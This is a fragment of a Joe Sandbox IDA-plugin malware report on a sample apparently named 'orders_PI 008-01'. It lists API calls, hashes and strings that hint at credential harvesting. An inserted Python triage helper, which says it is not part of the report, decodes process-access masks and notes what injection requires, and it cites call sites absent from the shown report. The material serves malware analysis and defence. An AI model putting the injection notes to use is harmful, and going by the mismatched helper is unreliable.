                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$Dialog$MessageSend
                                        • String ID:
                                        • API String ID: 3975816621-0
                                        • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                        • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                        • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                        • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00444D09
                                        • _wcsicmp.MSVCRT ref: 00444D1E
                                        • _wcsicmp.MSVCRT ref: 00444D33
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$wcslen$_memicmp
                                        • String ID: .save$http://$https://$log profile$signIn
                                        • API String ID: 1214746602-2708368587
                                        • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                        • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                        • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                        • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                        • memset.MSVCRT ref: 00405E33
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                        • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                        • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                        • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                        • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00405F65
                                        • GetWindow.USER32(?,00000005), ref: 00405F7D
                                        • GetWindow.USER32(00000000), ref: 00405F80
                                          • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                        • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                        • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                        • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageRectSend$Client
                                        • String ID:
                                        • API String ID: 2047574939-0
                                        • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                        • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                        • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                        • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00418836
                                        • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                        • GetCurrentProcessId.KERNEL32 ref: 00418856
                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                        • GetTickCount.KERNEL32 ref: 0041887D
                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                        • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                        • String ID:
                                        • API String ID: 4218492932-0
                                        • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                        • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                        • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                        • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
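                                         Added example, not part of this report or of Joe Sandbox's tooling: a Python triage helper that reads "APIs" blocks in the layout printed above and flags three call patterns from this section, the OpenProcess access mask at 00413A7A decoded into its documented PROCESS_* rights, the "-journal" / "-wal" strings built at 0041B93B and 0041B970 (SQLite's rollback-journal and write-ahead-log file suffixes), and the GetSystemTime / GetCurrentProcessId / GetTickCount / QueryPerformanceCounter values copied into one buffer from 00418836 onward. The embedded SAMPLE is a condensed copy of those blocks; the rule names, their wording and the "seed material" reading of the last pattern are this example's own heuristics, not labels the sandbox produces.

```python
# Triage helper for Joe Sandbox "APIs" blocks (added example, not sandbox code).
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: condensed copies of three blocks listed on this page.
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
• String ID: 3A
APIs
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• String ID: -journal$-wal
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
• String ID:
"""

SUBCALL_RE = re.compile(r"Part of subcall function ([0-9A-F]{8}):\s*")
# Matches "memcpy.MSVCRT(?,-wal,00000004), ref: 0041B970" and "GetTickCount.KERNEL32 ref: 0041887D".
API_RE = re.compile(r"(?P<name>[^\s.(]+)\.\w+(?:\((?P<args>.*?)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
# Documented PROCESS_* access-right bits (winnt.h), for decoding OpenProcess's first argument.
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}

@dataclass
class ApiCall:
    name: str
    args: list[str]                 # as printed: hex words, or "?" when unknown to the sandbox
    ref: int                        # call-site address
    subcall_of: int | None = None   # set for "Part of subcall function XXXXXXXX:" lines

@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)   # "String ID: a$b" -> ["a", "b"]

    def names(self) -> set[str]:
        # Direct callees only; subcall lines describe another function.
        return {c.name for c in self.calls if c.subcall_of is None}

def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            blocks.append(FunctionBlock())
        elif not blocks or not line.startswith("•"):
            continue
        elif line.startswith("• String ID:"):
            value = line.split(":", 1)[1].strip()
            blocks[-1].strings = value.split("$") if value else []
        else:
            body, subcall = line.lstrip("• "), None
            if m := SUBCALL_RE.match(body):
                subcall, body = int(m.group(1), 16), body[m.end():]
            if m := API_RE.match(body):
                args = [a for a in (m.group("args") or "").split(",") if a]
                blocks[-1].calls.append(ApiCall(m.group("name"), args, int(m.group("ref"), 16), subcall))
    return blocks

def hex_arg(call: ApiCall, i: int) -> int | None:
    """Argument i as an int, or None when the report printed it as '?'."""
    return int(call.args[i], 16) if len(call.args) > i and call.args[i] != "?" else None

def decode_access(mask: int) -> list[str]:
    return [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]

def rule_sqlite_sidecars(b: FunctionBlock) -> str | None:
    if {"-journal", "-wal"} <= set(b.strings):
        return ("builds SQLite sidecar names (-journal rollback journal, -wal write-ahead log); "
                "a database copied without its -wal misses transactions not yet checkpointed")
    return None

def rule_entropy_mix(b: FunctionBlock) -> str | None:
    sources = {"GetSystemTime", "GetCurrentProcessId", "GetTickCount", "QueryPerformanceCounter"} & b.names()
    if len(sources) >= 3 and "memcpy" in b.names():
        width = sum(w for c in b.calls if c.name == "memcpy" and (w := hex_arg(c, 2)) is not None)
        return f"copies {len(sources)} time/pid/counter values into a {width}-byte buffer: likely seed material, not a CSPRNG"
    return None

def rule_open_process(b: FunctionBlock) -> str | None:
    for c in b.calls:
        if c.name == "OpenProcess" and (mask := hex_arg(c, 0)) is not None:
            return f"OpenProcess access 0x{mask:X} = {' | '.join(decode_access(mask))}"
    return None

def triage(text: str) -> list[dict]:
    findings = []
    for i, b in enumerate(parse_blocks(text)):
        for rule in (rule_sqlite_sidecars, rule_entropy_mix, rule_open_process):
            if detail := rule(b):
                findings.append({"block": i, "rule": rule.__name__[5:], "detail": detail})
    return findings
```

                                         Run `triage()` over a saved copy of the report text; each finding carries the index of its "APIs" block so it can be matched back to the call-site addresses. The mask decoder is the part worth extending: 0x410 here is PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, which reads another process but cannot write to it, whereas a mask carrying PROCESS_VM_WRITE and PROCESS_VM_OPERATION is what a remote-write injection primitive needs.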
                                        APIs
                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                        • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: gj
                                        • API String ID: 438689982-4203073231
                                        • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                        • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                        • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                        • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                        APIs
                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                        • API String ID: 3510742995-2446657581
                                        • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                        • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                        • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                        • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                        • memset.MSVCRT ref: 00405ABB
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                        • SetFocus.USER32(?), ref: 00405B76
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                        • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                        • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                        • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintfwcscat
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 384018552-4153097237
                                        • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                        • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                        • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                        • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                        • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                        APIs
                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                        • memset.MSVCRT ref: 00405455
                                        • memset.MSVCRT ref: 0040546C
                                        • memset.MSVCRT ref: 00405483
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$ErrorLast
                                        • String ID: 6$\
                                        • API String ID: 404372293-1284684873
                                        • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                        • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                        • wcscpy.MSVCRT ref: 0040A0D9
                                        • wcscat.MSVCRT ref: 0040A0E6
                                        • wcscat.MSVCRT ref: 0040A0F5
                                        • wcscpy.MSVCRT ref: 0040A107
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                        • String ID:
                                        • API String ID: 1331804452-0
                                        • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                        • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                        APIs
                                          • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                        • String ID: advapi32.dll
                                        • API String ID: 2012295524-4050573280
                                        • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                        • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                        • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                        • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                        APIs
                                        Strings
                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                        • <%s>, xrefs: 004100A6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf
                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 3473751417-2880344631
                                        • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                        • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                        • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
